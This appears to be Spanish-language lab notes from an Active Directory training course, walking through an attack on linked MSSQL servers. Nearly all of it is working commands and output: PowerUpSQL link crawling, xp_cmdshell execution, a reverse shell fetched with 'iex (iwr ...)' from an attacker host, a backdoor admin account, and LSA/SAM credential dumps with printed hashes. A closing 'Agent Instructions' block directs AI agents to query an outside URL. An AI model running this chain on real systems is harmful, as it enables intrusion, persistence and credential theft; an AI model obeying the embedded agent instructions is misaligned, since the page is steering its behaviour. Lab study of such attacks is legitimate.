# Learning Objective - 22
## MSSQL Servers
Descubriendo SPNs.
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local
Instance : dcorp-mgmt.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123394400
DomainAccount : svcadmin
DomainAccountCn : svc admin
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
LastLogon : 1/10/2024 3:22 AM
Description : Account to be used for services which need high privileges.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : dcorp-mssql.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123385400
DomainAccount : DCORP-MSSQL$
DomainAccountCn : DCORP-MSSQL
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433
LastLogon : 3/5/2024 11:56 AM
Description :
ComputerName : dcorp-sql1.dollarcorp.moneycorp.local
Instance : dcorp-sql1.dollarcorp.moneycorp.local
DomainAccountSid : 15000005210001391322314218022427222724713123386400
DomainAccount : DCORP-SQL1$
DomainAccountCn : DCORP-SQL1
Service : MSSQLSvc
Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local
LastLogon : 3/5/2024 11:56 AM
Description :
```
Verificando acceso a los servicios.
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
VERBOSE: Creating runspace pool and session states
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: DCORP-STD723 : Connection Failed.
VERBOSE: Closing the runspace pool
ComputerName Instance Status
------------ -------- ------
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible
dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible
dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible
dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible
DCORP-STD723 DCORP-STD723 Not Accessible
```
Recolectamos informacion de los servicios a los cuales tenemos acceso.
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success.
VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed.
VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed.
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
ComputerName : dcorp-mssql.dollarcorp.moneycorp.local
Instance : DCORP-MSSQL
DomainName : dcorp
ServiceProcessID : 1976
ServiceName : MSSQLSERVER
ServiceAccount : NT AUTHORITY\NETWORKSERVICE
AuthenticationMode : Windows and SQL Server Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Developer Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : dcorp\student723
IsSysadmin : No
ActiveSessions : 1
```
Buscando enlaces al un servicio remoto de MSSQL.
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLink -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 0
DatabaseLinkName : DCORP-MSSQL
DatabaseLinkLocation : Local
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : True
is_data_access_enabled : False
modify_date : 11/14/2022 4:46:10 AM
ComputerName : dcorp-mssql
Instance : dcorp-mssql
DatabaseLinkId : 1
DatabaseLinkName : DCORP-SQL1
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
Catalog :
LocalLogin :
RemoteLoginName :
is_rpc_out_enabled : False
is_data_access_enabled : True
modify_date : 12/4/2022 5:16:19 AM
```
Enumerando enlaces de manera recursiva.
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student723
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL37
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL37.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
```
Luego ejecutamos comandos con el siguiente comando:
{% code overflow="wrap" %}
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
```
{% endcode %}
Probamos desde el uso de powershell.
{% code overflow="wrap" %}
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""whoami""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery : {nt authority\system, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
```
{% endcode %}
Luego Ejecutamos una reverse shell como ya lo hicimos antes pero esta vez usaremos otro metodo de descarga por powershell.
{% code overflow="wrap" %}
```
PS C:\AD\Tools\PowerUpSQL-master> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'powershell.exe -c ""iex (iwr -UseBasicParsing http://172.16.100.23:8080/Invoke-PowerShellTcp.ps1)""'" -QueryTarget eu-sql37
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student723
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL37.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL37
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL37.EU.EUROCORP.LOCAL}
User : sa
Links :
```
{% endcode %}
En nuestra otra terminal escuchamos en el puerto seteado y obtenemos shell.
```
C:\AD\Tools\netcat-win32-1.12>.\nc.exe -lvp 6969
listening on [any] 6969 ...
172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [172.16.100.23] from (UNKNOWN) [172.16.15.17] 56047: NO_DATA
Windows PowerShell running as user SYSTEM on EU-SQL37
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
eu-sql37
PS C:\Windows\system32>
```
Ahora intentaremos ver la informacion del dominio actual.
```
PS C:\> Invoke-WebRequest -Uri "http://172.16.100.23:8080/PowerView.ps1" -OutFile "PowerView.ps1"
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
PS C:\> . .\PowerView.ps1
PS C:\> Get-DomainComputer | select samaccountname
samaccountname
--------------
EU-DC$
EU-SQL37$
PS C:\> Get-DomainUser | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
dbadmin
PS C:\> Get-DomainTrust
SourceName : eu.eurocorp.local
TargetName : eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:15 AM
PS C:\> Get-Forest
RootDomainSid : S-1-5-21-3333069040-3914854601-3606488808
Name : eurocorp.local
Sites : {Default-First-Site-Name}
Domains : {eurocorp.local, eu.eurocorp.local}
GlobalCatalogs : {eurocorp-dc.eurocorp.local, eu-dc.eu.eurocorp.local}
ApplicationPartitions : {DC=ForestDnsZones,DC=eurocorp,DC=local, DC=DomainDnsZones,DC=eu,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local}
ForestModeLevel : 7
ForestMode : Unknown
RootDomain : eurocorp.local
Schema : CN=Schema,CN=Configuration,DC=eurocorp,DC=local
SchemaRoleOwner : eurocorp-dc.eurocorp.local
NamingRoleOwner : eurocorp-dc.eurocorp.local
PS C:\> Get-DomainComputer -Domain eurocorp.local | select samaccountname
samaccountname
--------------
EUROCORP-DC$
PS C:\> Get-DomainUser -Domain eurocorp.local | select samaccountname
samaccountname
--------------
Administrator
Guest
krbtgt
PS C:\> Get-DomainTrust -Domain eurocorp.local
SourceName : eurocorp.local
TargetName : eu.eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 2/20/2024 7:48:14 AM
SourceName : eurocorp.local
TargetName : dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 2/20/2024 7:50:52 AM
```
Tambien verificamos que tenemos acceso al computador desde nuestro PC.
```
PS C:\AD\Tools\PowerUpSQL-master> nslookup EU-SQL37.EU.EUROCORP.LOCAL
Server: UnKnown
Address: 172.16.2.1
Non-authoritative answer:
Name: EU-SQL37.EU.EUROCORP.LOCAL
Address: 172.16.15.17
PS C:\AD\Tools\PowerUpSQL-master> ping 172.16.15.17
Pinging 172.16.15.17 with 32 bytes of data:
Reply from 172.16.15.17: bytes=32 time=5ms TTL=127
Reply from 172.16.15.17: bytes=32 time=4ms TTL=127
Ping statistics for 172.16.15.17:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 4ms, Maximum = 5ms, Average = 4ms
```
Haciendo persistencia media maƱosa XD
```
PS C:\Windows\system32> net user bombitaeu Password123! /add
The command completed successfully.
PS C:\Windows\system32> net localgroup administrators bombitaeu /add
The command completed successfully.
PS C:\Windows\system32> net user bombitaeu
User name bombitaeu
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/6/2024 6:34:21 AM
Password expires 4/17/2024 6:34:21 AM
Password changeable 3/7/2024 6:34:21 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
PS C:\Windows\system32>
```
Dumpeamos lo que podamos.
```
crackmapexec smb 172.16.15.17 -u 'bombitaeu' -p 'Password123!' -d '.' --lsa
SMB 172.16.15.17 445 EU-SQL37 [*] Windows 10.0 Build 20348 x64 (name:EU-SQL37) (domain:.) (signing:False) (SMBv1:False)
SMB 172.16.15.17 445 EU-SQL37 [+] .\bombitaeu:Password123! (Pwn3d!)
SMB 172.16.15.17 445 EU-SQL37 [+] Dumping LSA secrets
SMB 172.16.15.17 445 EU-SQL37 EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
SMB 172.16.15.17 445 EU-SQL37 EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
SMB 172.16.15.17 445 EU-SQL37 dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
SMB 172.16.15.17 445 EU-SQL37 NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB 172.16.15.17 445 EU-SQL37 [+] Dumped 8 LSA secrets to /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.secrets and /home/dsds/.cme/logs/EU-SQL37_172.16.15.17_2024-03-06_093844.cached
```
```
impacket-secretsdump 'bombitaeu@172.16.15.17'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Target system bootKey: 0x5522f4ec06d0bf5dac89558b5e57206e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdcfd73ba273d2b6ab67f1fecd83e88e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bombitaeu:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[*] Dumping cached domain logon information (domain/username:hash)
EU.EUROCORP.LOCAL/dbadmin:$DCC2$10240#dbadmin#e1dfb4e157d2d93cbad84aa6337579ab
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EU\EU-SQL37$:aes256-cts-hmac-sha1-96:b99144ff967bbd816cd8e023b085a946f6da5c5c6257ff259fd9ff97864a25cc
EU\EU-SQL37$:aes128-cts-hmac-sha1-96:2ac9e69575c067f8e98d34d42cab4499
EU\EU-SQL37$:des-cbc-md5:34046275fe61bf20
EU\EU-SQL37$:plain_password_hex:30002b00430038005a00550042004a00730045004b002400710071004e0070002300790058003c0074005200580071005d00720065003300280036005700720030005c0024003a0078002d00500078005e0030002e004c006600290069006c0034002900270047005200390020006100210037003e003900600061005f004a0020002400590029004b007a00570075005b006c004100240070005200290043006a004c006500750058004000250037005c003900620077003c00370021006d004400550040003a005400570042005300710068003b00480041002c00310037002f004f007a005f0035006f0069003900
EU\EU-SQL37$:aad3b435b51404eeaad3b435b51404ee:7e830858b5092628bd7b8a5d48e4b23b:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xe4ed1312a345ef13927866ae066c3aa659d23ed5
dpapi_userkey:0x66b30ebfe4c144d1df515aec7b43e7c05d91c0bb
[*] NL$KM
0000 09 C8 7B C2 96 41 6E CB B2 F6 1B DC 29 5C 39 76 ..{..An.....)\9v
0010 7E A6 22 97 DC D3 BE 6B C3 71 48 71 61 6B B2 B3 ~."....k.qHqak..
0020 D0 D6 E0 48 F0 8B 7D 8B 8B 14 95 05 B4 21 FE 93 ...H..}......!..
0030 28 51 47 F1 26 24 B5 F4 E4 20 B6 AC E5 90 33 02 (QG.&$... ....3.
NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
[*] Cleaning up...
```
## Consultando mediante consultas SQL directamente
Como esta fallando, realizaremos las pruebas desde SQL.
Segundo salto.
Tercer salto.
Ejecutando comandos.
{% code overflow="wrap" %}
```
select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgmt",''select * from openquery("eu-sql37.eu.eurocorp.local",''''select @@version as version;exec master..xp_cmdshell "mkdir C:\test"'''')'')')
```
{% endcode %}
Luego podemos ver que el directorio test si a sido creado.
```
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:15 AM PerfLogs
d-r--- 11/14/2022 7:42 PM Program Files
d----- 11/14/2022 7:41 PM Program Files (x86)
d----- 3/6/2024 7:18 AM test
d-r--- 11/15/2022 1:49 AM Users
d----- 1/10/2024 5:38 AM Windows
-a---- 3/6/2024 6:11 AM 924339 PowerView.ps1
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-22.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.